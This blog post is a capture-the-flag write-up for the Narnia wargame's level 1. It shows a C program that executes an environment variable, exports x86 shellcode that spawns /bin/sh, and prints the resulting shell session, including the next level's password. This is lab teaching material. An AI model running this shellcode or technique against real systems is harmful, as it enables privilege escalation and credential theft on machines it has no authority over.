Narnia: Level 1

We all have to start somewhere

Posted on May 7, 2017, 3:57 p.m.

Level 1 is designed to demonstrate how environment variables can be used as an attack vector. As before, we run cat narnia1.c.

#include <stdio.h>

int main(){
    int (*ret)();

    if(getenv("EGG")==NULL){    
        printf("Give me something to execute at the env-variable EGG\n");
        exit(1);
    }

    printf("Trying to execute EGG!\n");
    ret = getenv("EGG");
    ret();

    return 0;
}

Here the program gets a pointer to the EGG environment variable (if it exists) and calls it as a function pointer. What we need to do therefore is write a function in assembly that opens a shell and set that to be the value of EGG. If you want to be a script kiddie you can ask Google to give you the shellcode, or you can read Steve Hanna's excellent tutorial and learn how to write it yourself.

narnia1@melinda:/narnia$ export EGG=$(python -c 'print "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42"')
narnia1@melinda:/narnia$ ./narnia1 
Trying to execute EGG!
$ whoami
narnia2
$ cat /etc/narnia_pass/narnia2
nairiepecu

Comments


Latest Posts


Archive

2017

Categories